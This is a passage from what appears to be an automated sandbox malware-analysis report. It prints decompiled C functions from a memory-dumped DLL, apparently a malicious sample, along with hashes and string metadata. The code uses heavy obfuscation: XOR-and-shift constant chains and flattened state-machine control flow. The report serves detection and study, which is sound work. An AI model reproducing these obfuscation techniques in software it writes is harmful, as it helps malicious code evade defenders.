                          				_t453[7] = _t453[7] | 0x54c51839;
                          				_t453[7] = _t453[7] ^ 0x54ca1cec;
                          				_t453[0x1c] = 0x270edd;
                          				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
                          				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
                          				_t453[0x22] = 0x4b1e01;
                          				_t453[0x22] = _t453[0x22] >> 0xa;
                          				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
                          				_t453[0xf] = 0x1097d4;
                          				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
                          				_t453[0xf] = _t453[0xf] << 7;
                          				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
                          				_t453[0xd] = 0x3e61;
                          				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
                          				_t453[0xd] = _t453[0xd] << 5;
                          				_t453[0xd] = _t453[0xd] ^ 0x28127601;
                          				_t453[0x19] = 0xea3040;
                          				_t265 =  &(_t453[0x19]); // 0xea3040
                          				_t446 = 0x24;
                          				_t390 = _t453[0x2a];
                          				_t453[0x1a] =  *_t265 * 0x3e;
                          				_t435 = _t453[0x2a];
                          				_t453[0x1a] = _t453[0x1a] / _t446;
                          				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
                          				_t453[0xd] = 0xdd1c82;
                          				_t447 = 0x39;
                          				_t451 = _t453[0x29];
                          				_t453[0xc] = _t453[0xd] * 0x64;
                          				_t453[0xc] = _t453[0xc] / _t447;
                          				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
                          				L1:
                          				while(1) {
                          					while(_t392 != 0x17dddcb) {
                          						if(_t392 == 0x8a29766) {
                          							E00D52B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
                          							_t392 = 0xcdeb26f;
                          							continue;
                          						} else {
                          							if(_t392 == 0xac116a6) {
                          								E00D50DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
                          								_t373 = E00D409DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
                          								_t451 = _t373;
                          								_t453 =  &(_t453[5]);
                          								_t392 = 0xf1147e4;
                          								 *((short*)(_t373 - 2)) = 0;
                          								continue;
                          							} else {
                          								if(_t392 == 0xcdeb26f) {
                          									_t337 =  &(_t453[0x19]); // 0xea3040
                          									E00D51538( *_t337, _t453[0xc], _t390);
                          								} else {
                          									if(_t392 == 0xe12044f) {
                          										_t392 = 0xac116a6;
                          										continue;
                          									} else {
                          										if(_t392 == 0xe899f05) {
                          											_t378 = E00D4E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
                          											_t453 =  &(_t453[0xc]);
                          											__eflags = _t378;
                          											if(_t378 == 0) {
                          												L17:
                          												_t379 = _t453[0x2a];
                          											} else {
                          												_t449 = _t435;
                          												while(1) {
                          													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
                          													if( *((intOrPtr*)(_t449 + 4)) != 4) {
                          														goto L14;
                          													}
                          													L13:
                          													_t387 = E00D5061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
                          													_t453 =  &(_t453[3]);
                          													__eflags = _t387;
                          													if(_t387 == 0) {
                          														_t379 = 1;
                          														_t453[0x2a] = 1;
                          													} else {
                          														goto L14;
                          													}
                          													goto L18;
                          													L14:
                          													_t385 =  *_t449;
                          													__eflags = _t385;
                          													if(_t385 == 0) {
                          														goto L17;
                          													} else {
                          														_t449 = _t449 + _t385;
                          														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
                          														if( *((intOrPtr*)(_t449 + 4)) != 4) {
                          															goto L14;
                          														}
                          													}
                          													goto L18;
                          												}
                          											}
                          											L18:
                          											__eflags = _t379;
                          											if(__eflags == 0) {
                          												L20:
                          												_t392 = 0xe899f05;
                          											} else {
                          												_t383 =  *0xd56208; // 0x0
                          												E00D527BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
                          												_t392 = 0x8a29766;
                          											}
                          											continue;
                          											L30:
                          										} else {
                          											if(_t392 != 0xf1147e4) {
                          												L26:
                          												__eflags = _t392 - 0x2906cf2;
                          												if(__eflags != 0) {
                          													continue;
                          												} else {
                          												}
                          											} else {
                          												_t382 = E00D545CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
                          												_t390 = _t382;
                          												_t453 =  &(_t453[0xc]);
                          												if(_t382 != 0xffffffff) {
                          													_t392 = 0x17dddcb;
                          													continue;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L29:
                          						__eflags = 0;
                          						return 0;
                          						goto L30;
                          					}
                          					_push(_t392);
                          					_push(_t392);
                          					_t453[0x2c] = 0x1000;
                          					_t435 = E00D3C5D8(0x1000);
                          					_t453 =  &(_t453[3]);
                          					__eflags = _t435;
                          					if(__eflags != 0) {
                          						goto L20;
                          					} else {
                          						_t392 = 0xcdeb26f;
                          						goto L26;
                          					}
                          					goto L29;
                          				}
                          			}

                          0x00d53d95
                          0x00d53d9c
                          0x00000000
                          0x00d53bda
                          0x00d53be0
                          0x00d53d4f
                          0x00d53d6a
                          0x00d53d6f
                          0x00d53d71
                          0x00d53d76
                          0x00d53d7b
                          0x00000000
                          0x00d53be6
                          0x00d53bec
                          0x00d53df4
                          0x00d53df9
                          0x00d53bf2
                          0x00d53bf8
                          0x00d53d31
                          0x00000000
                          0x00d53bfe
                          0x00d53c04
                          0x00d53cac
                          0x00d53cb1
                          0x00d53cb4
                          0x00d53cb6
                          0x00d53cf7
                          0x00d53cf7
                          0x00d53cb8
                          0x00d53cb8
                          0x00d53cba
                          0x00d53cba
                          0x00d53cbe
                          0x00000000
                          0x00000000
                          0x00d53cc0
                          0x00d53cd5
                          0x00d53cda
                          0x00d53cdd
                          0x00d53cdf
                          0x00d53ced
                          0x00d53cee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00d53ce1
                          0x00d53ce1
                          0x00d53ce3
                          0x00d53ce5
                          0x00000000
                          0x00d53ce7
                          0x00d53ce7
                          0x00d53cba
                          0x00d53cbe
                          0x00000000
                          0x00000000
                          0x00d53cbe
                          0x00000000
                          0x00d53ce5
                          0x00d53cba
                          0x00d53cfe
                          0x00d53cfe
                          0x00d53d00
                          0x00d53d27
                          0x00d53d27
                          0x00d53d02
                          0x00d53d06
                          0x00d53d16
                          0x00d53d1d
                          0x00d53d1d
                          0x00000000
                          0x00000000
                          0x00d53c06
                          0x00d53c0c
                          0x00d53de2
                          0x00d53de2
                          0x00d53de8
                          0x00000000
                          0x00000000
                          0x00d53dee
                          0x00d53c12
                          0x00d53c53
                          0x00d53c58
                          0x00d53c5a
                          0x00d53c60
                          0x00d53c66
                          0x00000000
                          0x00d53c66
                          0x00d53c60
                          0x00d53c0c
                          0x00d53c04
                          0x00d53bf8
                          0x00d53bec
                          0x00d53be0
                          0x00d53dff
                          0x00d53e02
                          0x00d53e0b
                          0x00000000
                          0x00d53e0b
                          0x00d53db9
                          0x00d53dba
                          0x00d53dc0
                          0x00d53dd0
                          0x00d53dd2
                          0x00d53dd5
                          0x00d53dd7
                          0x00000000
                          0x00d53ddd
                          0x00d53ddd
                          0x00000000
                          0x00d53ddd
                          0x00000000
                          0x00d53dd7

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
                          • API String ID: 0-3081288078
                          • Opcode ID: 4a517a7ce6a73ad0e2c9873d75831b769f7b101ab7d9390b5fc07cc3ed8ecf02
                          • Instruction ID: 7bb492653bb08cddc08acd4d768d43a608f4a2a1204764e5ed99eca97b2a2846
                          • Opcode Fuzzy Hash: 4a517a7ce6a73ad0e2c9873d75831b769f7b101ab7d9390b5fc07cc3ed8ecf02
                          • Instruction Fuzzy Hash: 2D0240715083809FD7A8CF65C48AA5BBBF1FBC4758F10890DEADA86260D7B48948CB53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00D546BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				void* _t316;
                          				intOrPtr _t339;
                          				intOrPtr* _t341;
                          				void* _t343;
                          				intOrPtr* _t346;
                          				void* _t348;
                          				intOrPtr* _t349;
                          				void* _t351;
                          				intOrPtr _t367;
                          				signed int _t370;
                          				signed int _t371;
                          				signed int _t372;
                          				signed int _t373;
                          				void* _t375;
                          				void* _t376;
                          
                          				_t369 = _a16;
                          				_t349 = __edx;
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t316);
                          				_v16 = 0xd9d351;
                          				_t367 = 0;
                          				_v12 = 0x17e122;
                          				_t376 = _t375 + 0x18;
                          				_v8 = 0;
                          				_v96 = 0xcc9d59;
                          				_t351 = 0xff449f4;
                          				_v96 = _v96 << 0xc;
                          				_v96 = _v96 + 0x162d;
                          				_v96 = _v96 ^ 0xc9d5a62c;
                          				_v132 = 0x3cc17f;
                          				_v132 = _v132 + 0xffff84d9;
                          				_t370 = 0x52;
                          				_v132 = _v132 * 0x3d;
                          				_v132 = _v132 << 0xf;
                          				_v132 = _v132 ^ 0x617c0001;
                          				_v48 = 0x63951b;
                          				_v48 = _v48 >> 7;
                          				_v48 = _v48 ^ 0x0000c72a;
                          				_v64 = 0xbc1395;
                          				_v64 = _v64 >> 0xd;
                          				_v64 = _v64 ^ 0x000005e0;
                          				_v80 = 0x50b5ee;
                          				_v80 = _v80 + 0xf34;
                          				_v80 = _v80 >> 1;
                          				_v80 = _v80 ^ 0x00286291;
                          				_v92 = 0x9715d8;
                          				_v92 = _v92 * 0x46;
                          				_v92 = _v92 << 0xd;
                          				_v92 = _v92 ^ 0xff220000;
                          				_v52 = 0xfde3f2;
                          				_v52 = _v52 + 0xa710;
                          				_v52 = _v52 ^ 0x00fe8b02;
                          				_v160 = 0x198337;
                          				_v160 = _v160 + 0xffff007e;
                          				_v160 = _v160 << 0x10;
                          				_v160 = _v160 ^ 0x69569842;
                          				_v160 = _v160 ^ 0xeaeb46e9;
                          				_v28 = 0xcc69bd;
                          				_v28 = _v28 ^ 0xeecfab9f;
                          				_v28 = _v28 ^ 0xee01123b;
                          				_v136 = 0x76b317;
                          				_v136 = _v136 / _t370;
                          				_v136 = _v136 + 0xffff81f3;
                          				_v136 = _v136 << 3;
                          				_v136 = _v136 ^ 0x00064d41;
                          				_v112 = 0x80a4bd;
                          				_v112 = _v112 * 0x13;
                          				_v112 = _v112 << 0xa;
                          				_v112 = _v112 + 0xcad4;
                          				_v112 = _v112 ^ 0x30efc400;
                          				_v144 = 0x82a288;
                          				_v144 = _v144 << 2;
                          				_v144 = _v144 >> 0xe;
                          				_v144 = _v144 << 9;
                          				_v144 = _v144 ^ 0x0011be13;
                          				_v56 = 0x7edd30;
                          				_v56 = _v56 * 0x55;
                          				_v56 = _v56 ^ 0x2a184bb4;
                          				_v88 = 0xe2a415;
                          				_t371 = 6;
                          				_v88 = _v88 * 0x2a;
                          				_v88 = _v88 + 0xffff5f32;
                          				_v88 = _v88 ^ 0x252ac732;
                          				_v128 = 0xe004bc;
                          				_v128 = _v128 ^ 0x574173bd;
                          				_v128 = _v128 >> 9;
                          				_v128 = _v128 ^ 0xd8221cc5;
                          				_v128 = _v128 ^ 0xd803a3d4;
                          				_v152 = 0x516ea5;
                          				_v152 = _v152 + 0xffff4486;
                          				_v152 = _v152 | 0x140257d0;
                          				_v152 = _v152 >> 0xf;
                          				_v152 = _v152 ^ 0x00051039;
                          				_v120 = 0x9f4975;
                          				_v120 = _v120 ^ 0x86b89632;
                          				_v120 = _v120 * 0x24;
                          				_v120 = _v120 | 0x1b5f0b87;
                          				_v120 = _v120 ^ 0xdfd1de63;
                          				_v36 = 0xa5f8e9;
                          				_v36 = _v36 + 0x714e;
                          				_v36 = _v36 ^ 0x00af22d8;
                          				_v44 = 0x824fdb;
                          				_v44 = _v44 + 0xffff91e5;
                          				_v44 = _v44 ^ 0x008fd473;
                          				_v68 = 0x680ab0;
                          				_v68 = _v68 + 0xbc39;
                          				_v68 = _v68 / _t371;
                          				_v68 = _v68 ^ 0x001a68c1;
                          				_v76 = 0x17a4af;
                          				_v76 = _v76 >> 0xb;
                          				_t372 = 0x5b;
                          				_v76 = _v76 / _t372;
                          				_v76 = _v76 ^ 0x0007f211;
                          				_v84 = 0x315e60;
                          				_v84 = _v84 + 0x702b;
                          				_v84 = _v84 + 0xffff10cc;
                          				_v84 = _v84 ^ 0x003e64ec;
                          				_v100 = 0x9cc34d;
                          				_v100 = _v100 | 0x947c2ff5;
                          				_t373 = 0x3a;
                          				_v100 = _v100 / _t373;
                          				_v100 = _v100 ^ 0x02979c4b;
                          				_v140 = 0xbfeff4;
                          				_v140 = _v140 ^ 0x822e0370;
                          				_v140 = _v140 + 0xf2f6;
                          				_v140 = _v140 | 0x96ab8507;
                          				_v140 = _v140 ^ 0x96bf89b8;
                          				_v60 = 0xfd95c4;
                          				_v60 = _v60 << 3;
                          				_v60 = _v60 ^ 0x07e16726;
                          				_v148 = 0x38036;
                          				_v148 = _v148 ^ 0x54103d5f;
                          				_v148 = _v148 | 0x54303272;
                          				_t206 =  &_v148; // 0x54303272
                          				_v148 =  *_t206;
                          				_v148 = _v148 ^ 0x5432cd2c;
                          				_v40 = 0xc550eb;
                          				_v40 = _v40 | 0x63f29c9e;
                          				_v40 = _v40 ^ 0x63f29262;
                          				_v32 = 0xf7791b;
                          				_v32 = _v32 * 0x51;
                          				_v32 = _v32 ^ 0x4e4d9c2b;
                          				_v156 = 0xdcae59;
                          				_v156 = _v156 + 0xffffc6cd;
                          				_v156 = _v156 + 0xfffffd52;
                          				_v156 = _v156 ^ 0x46382038;
                          				_v156 = _v156 ^ 0x46e78b29;
                          				_v72 = 0xac5d66;
                          				_v72 = _v72 | 0xb655dd15;
                          				_v72 = _v72 + 0xffff07b1;
                          				_v72 = _v72 ^ 0xb6f51c6c;
                          				_v104 = 0x2e3a8e;
                          				_v104 = _v104 | 0xfac334a1;
                          				_v104 = _v104 << 4;
                          				_v104 = _v104 ^ 0xaefe5277;
                          				_v108 = 0xcd35f0;
                          				_v108 = _v108 << 0xf;
                          				_v108 = _v108 | 0xf31160b4;
                          				_v108 = _v108 ^ 0xc3cc8d90;
                          				_v108 = _v108 ^ 0x3831362e;
                          				_v116 = 0x7e4b3f;
                          				_v116 = _v116 << 9;
                          				_v116 = _v116 + 0xa646;
                          				_v116 = _v116 + 0x5b3c;
                          				_v116 = _v116 ^ 0xfc982242;
                          				_v124 = 0x9fd9df;
                          				_v124 = _v124 >> 6;
                          				_v124 = _v124 << 0xf;
                          				_v124 = _v124 << 1;
                          				_v124 = _v124 ^ 0x7f607f7f;
                          				do {
                          					while(_t351 != 0x8274db) {
                          						if(_t351 == 0x30c1656) {
                          							_push(_t351);
                          							_push(_t351);
                          							_t339 = E00D3C5D8(_v20);
                          							_t376 = _t376 + 0xc;
                          							_v24 = _t339;
                          							if(_t339 != 0) {
                          								_t351 = 0x6ee5562;
                          								continue;
                          							}
                          						} else {
                          							if(_t351 == 0x6ee5562) {
                          								_t341 =  *0xd56224; // 0x0
                          								_t343 = E00D511B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
                          								_t376 = _t376 + 0x48;
                          								if(_t343 == _v52) {
                          									 *_t349 = _v24;
                          									_t367 = 1;
                          									 *((intOrPtr*)(_t349 + 4)) = _v20;
                          								} else {
                          									_t351 = 0x8274db;
                          									continue;
                          								}
                          							} else {
                          								if(_t351 == 0xc41b31c) {
                          									_t346 =  *0xd56224; // 0x0
                          									_t348 = E00D511B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
                          									_t376 = _t376 + 0x48;
                          									if(_t348 == _v80) {
                          										_t351 = 0x30c1656;
                          										continue;
                          									}
                          								} else {
                          									if(_t351 != 0xff449f4) {
                          										goto L14;
                          									} else {
                          										_t351 = 0xc41b31c;
                          										continue;
                          									}
                          								}
                          							}
                          						}
                          						L17:
                          						return _t367;
                          					}
                          					E00D52B09(_v108, _v24, _v116, _v124);
                          					_t351 = 0xc0b2195;
                          					L14:
                          				} while (_t351 != 0xc0b2195);
                          				goto L17;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
                          • API String ID: 0-914106314
                          • Opcode ID: 7bd4cf2ee6aeb00388430dd19e8848353efed79b40950a19b905638b15549b95
                          • Instruction ID: c03654994272524ef82d459a2d7fb488c8916ef5051ba4f024f735411a82d301
                          • Opcode Fuzzy Hash: 7bd4cf2ee6aeb00388430dd19e8848353efed79b40950a19b905638b15549b95
                          • Instruction Fuzzy Hash: BBF1EE71009380DFD769CF61C98AA5BBBF1FB85748F108A1DE6DA86260D7B58948CF13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00D4017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                          				intOrPtr _v60;
                          				char _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				char _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				char _t272;
                          				void* _t295;
                          				signed int _t305;
                          				signed int _t306;
                          				signed int _t307;
                          				signed int _t308;
                          				signed int _t309;
                          				void* _t312;
                          				void* _t334;
                          				intOrPtr _t335;
                          				signed int* _t338;
                          
                          				_push(_a32);
                          				_t334 = __ecx;
                          				_push(_a28);
                          				_push(_a24);
                          				_push(_a20);
                          				_push(_a16);
                          				_push(_a12);
                          				_push(0);
                          				_push(_a4);
                          				_push(0);
                          				_push(__ecx);
                          				_t272 = E00D4FE29(0);
                          				_v84 = _t272;
                          				_t338 =  &(( &_v196)[0xa]);
                          				_v72 = _t272;
                          				_t335 = _t272;
                          				_v80 = 0x49e87b;
                          				_v76 = 0xc5c8e1;
                          				_t312 = 0x7956bd9;
                          				_v96 = 0x2d2511;
                          				_t305 = 0x6f;
                          				_v96 = _v96 / _t305;
                          				_v96 = _v96 ^ 0x00006c1e;
                          				_v192 = 0x2be237;
                          				_t22 =  &_v192; // 0x2be237
                          				_t306 = 0x35;
                          				_v192 =  *_t22 * 0x2a;
                          				_v192 = _v192 ^ 0x8f196f07;
                          				_v192 = _v192 ^ 0x2da4b7e5;
                          				_v192 = _v192 ^ 0xa58ec5c4;
                          				_v172 = 0x207d98;
                          				_v172 = _v172 ^ 0x972b32db;
                          				_v172 = _v172 | 0x9c7c4c28;
                          				_v172 = _v172 * 0x48;
                          				_v172 = _v172 ^ 0xdbcfdb8a;
                          				_v100 = 0x57c7e;
                          				_v100 = _v100 + 0xffffdd89;
                          				_v100 = _v100 ^ 0x000aed2d;
                          				_v124 = 0x64cad1;
                          				_v124 = _v124 + 0xffff2d5b;
                          				_v124 = _v124 << 4;
                          				_v124 = _v124 ^ 0x063cb223;
                          				_v148 = 0xd38c19;
                          				_v148 = _v148 >> 7;
                          				_v148 = _v148 >> 0xf;
                          				_v148 = _v148 ^ 0x0008e1ac;
                          				_v88 = 0xe6598d;
                          				_v88 = _v88 ^ 0xb40d33dc;
                          				_v88 = _v88 ^ 0xb4eaaa1c;
                          				_v92 = 0x85b818;
                          				_v92 = _v92 + 0xffffc4c3;
                          				_v92 = _v92 ^ 0x008e2283;
                          				_v104 = 0x6cafca;
                          				_v104 = _v104 * 0x73;
                          				_v104 = _v104 ^ 0x30d8f33f;
                          				_v120 = 0xea107;
                          				_v120 = _v120 / _t306;
                          				_v120 = _v120 ^ 0x000228b8;
                          				_v112 = 0x4bcc54;
                          				_v112 = _v112 * 0x3f;
                          				_v112 = _v112 ^ 0x12af13c7;
                          				_v176 = 0x25f352;
                          				_v176 = _v176 * 0x1d;
                          				_t307 = 0x55;
                          				_v176 = _v176 / _t307;
                          				_v176 = _v176 + 0xa166;
                          				_v176 = _v176 ^ 0x00018b34;
                          				_v168 = 0x70163a;
                          				_v168 = _v168 | 0xb665b778;
                          				_v168 = _v168 + 0xffff15cb;
                          				_v168 = _v168 + 0xffff931b;
                          				_v168 = _v168 ^ 0xb6787764;
                          				_v184 = 0xfb3451;
                          				_t308 = 0x2f;
                          				_v184 = _v184 * 0x55;
                          				_v184 = _v184 + 0xffff75a5;
                          				_v184 = _v184 * 0x5c;
                          				_v184 = _v184 ^ 0xf953722f;
                          				_v160 = 0x3448db;
                          				_v160 = _v160 | 0x0a9a3806;
                          				_v160 = _v160 + 0xffffbb3e;
                          				_v160 = _v160 << 6;
                          				_v160 = _v160 ^ 0xaf82d104;
                          				_v108 = 0x7f4bc6;
                          				_v108 = _v108 * 0x47;
                          				_v108 = _v108 ^ 0x234271fe;
                          				_v116 = 0x137e80;
                          				_v116 = _v116 << 7;
                          				_v116 = _v116 ^ 0x09bed852;
                          				_v140 = 0x58b738;
                          				_v140 = _v140 >> 3;
                          				_v140 = _v140 / _t308;
                          				_v140 = _v140 ^ 0x0006291c;
                          				_v152 = 0x1dae44;
                          				_v152 = _v152 + 0xb010;
                          				_t309 = 0x7a;
                          				_v152 = _v152 / _t309;
                          				_v152 = _v152 ^ 0x0004435a;
                          				_v136 = 0x3e9c6a;
                          				_v136 = _v136 + 0xffff4267;
                          				_v136 = _v136 + 0xa013;
                          				_v136 = _v136 ^ 0x00313444;
                          				_v128 = 0xfc4661;
                          				_v128 = _v128 ^ 0x84ef8931;
                          				_v128 = _v128 >> 6;
                          				_v128 = _v128 ^ 0x021c54a7;
                          				_v144 = 0x2fd65c;
                          				_v144 = _v144 | 0x65ad1a2d;
                          				_v144 = _v144 ^ 0x87299bd7;
                          				_v144 = _v144 ^ 0xe281bdf5;
                          				_v180 = 0x40c6e5;
                          				_v180 = _v180 + 0xffff5f75;
                          				_v180 = _v180 + 0x6863;
                          				_v180 = _v180 << 0xc;
                          				_v180 = _v180 ^ 0x08e53add;
                          				_v132 = 0x50fbcf;
                          				_v132 = _v132 | 0xda091e24;
                          				_v132 = _v132 + 0xffffc3f6;
                          				_v132 = _v132 ^ 0xda5ae4d8;
                          				_v188 = 0x29fd87;
                          				_v188 = _v188 | 0x249d2c08;
                          				_v188 = _v188 << 1;
                          				_v188 = _v188 | 0xc4033418;
                          				_v188 = _v188 ^ 0xcd7b5999;
                          				_v196 = 0x78de76;
                          				_v196 = _v196 * 0x7c;
                          				_v196 = _v196 + 0xffff171c;
                          				_v196 = _v196 >> 5;
                          				_v196 = _v196 ^ 0x01d3afb7;
                          				_v156 = 0x2e37f5;
                          				_v156 = _v156 + 0xffff32dd;
                          				_v156 = _v156 >> 1;
                          				_v156 = _v156 * 0x73;
                          				_v156 = _v156 ^ 0x0a367c41;
                          				_v164 = 0x79bcb0;
                          				_v164 = _v164 + 0x8106;
                          				_v164 = _v164 + 0x4469;
                          				_v164 = _v164 + 0xffff19e3;
                          				_v164 = _v164 ^ 0x007fae8c;
                          				do {
                          					while(_t312 != 0x59e10b1) {
                          						if(_t312 == 0x7956bd9) {
                          							_t312 = 0x84e17ac;
                          							continue;
                          						} else {
                          							if(_t312 == 0x84e17ac) {
                          								_t264 =  &_v84; // 0x49e87b
                          								_t267 =  &_v172; // 0xa367c41
                          								_t295 = E00D44178( *_t267, _v100, _t264, _a20, _v124);
                          								_t338 =  &(_t338[4]);
                          								__eflags = _t295;
                          								if(_t295 != 0) {
                          									_t312 = 0x9148c69;
                          									continue;
                          								}
                          							} else {
                          								_t344 = _t312 - 0x9148c69;
                          								if(_t312 != 0x9148c69) {
                          									goto L10;
                          								} else {
                          									E00D4FE2A(_v148, _v88, 0x44,  &_v68);
                          									_push(_v112);
                          									_v68 = 0x44;
                          									_push(_v120);
                          									_push(_v104);
                          									_v60 = E00D4E1F8(0xd31224, _v92, _t344);
                          									_t335 = E00D3473D(_a20, _v176, _v168, 0xd31224, 0xd31224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0xd31224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
                          									E00D4FECB(_v60, _v180, _v132, _v188, _v196);
                          									_t338 =  &(_t338[0x1c]);
                          									_t312 = 0x59e10b1;
                          									continue;
                          								}
                          							}
                          						}
                          						goto L11;
                          					}
                          					_t269 =  &_v84; // 0x49e87b
                          					E00D47952(_v156,  *_t269, _v164);
                          					_t312 = 0xf5fdc0f;
                          					L10:
                          					__eflags = _t312 - 0xf5fdc0f;
                          				} while (_t312 != 0xf5fdc0f);
                          				L11:
                          				return _t335;
                          			}

















































                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -$7+$A|6$D$D41$ch$iD${I
                          • API String ID: 0-1622838380
                          • Opcode ID: 7d959173e9347e1489cffa29675bd6c5ac9a63307b87e7aaa1fe1d64740777c8
                          • Instruction ID: f68ee437dd46fc04e97138adf00d951756bb0d038a5a3a7813efa65f0207835f
                          • Opcode Fuzzy Hash: 7d959173e9347e1489cffa29675bd6c5ac9a63307b87e7aaa1fe1d64740777c8
                          • Instruction Fuzzy Hash: 6AD1FEB25083819FD3A8CF61C889A1BFBE1FBD5358F508A1DF69596260D3B58948CF13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D427F9() {
                          				char _v520;
                          				char _v1040;
                          				signed int _v1044;
                          				signed int _v1048;
                          				signed int _v1052;
                          				signed int _v1056;
                          				signed int _v1060;
                          				signed int _v1064;
                          				signed int _v1068;
                          				signed int _v1072;
                          				signed int _v1076;
                          				signed int _v1080;
                          				signed int _v1084;
                          				signed int _v1088;
                          				signed int _v1092;
                          				signed int _v1096;
                          				signed int _v1100;
                          				signed int _v1104;
                          				signed int _v1108;
                          				signed int _v1112;
                          				signed int _v1116;
                          				signed int _v1120;
                          				signed int _v1124;
                          				signed int _v1128;
                          				signed int _v1132;
                          				signed int _v1136;
                          				signed int _v1140;
                          				signed int _v1144;
                          				short* _t249;
                          				void* _t251;
                          				intOrPtr _t253;
                          				intOrPtr _t257;
                          				void* _t260;
                          				intOrPtr _t267;
                          				signed int _t288;
                          				signed int _t289;
                          				signed int _t290;
                          				signed int _t291;
                          				signed int* _t294;
                          
                          				_t294 =  &_v1144;
                          				_v1076 = 0xe2454d;
                          				_v1076 = _v1076 << 0xe;
                          				_t260 = 0xa27996a;
                          				_v1076 = _v1076 ^ 0x9150c829;
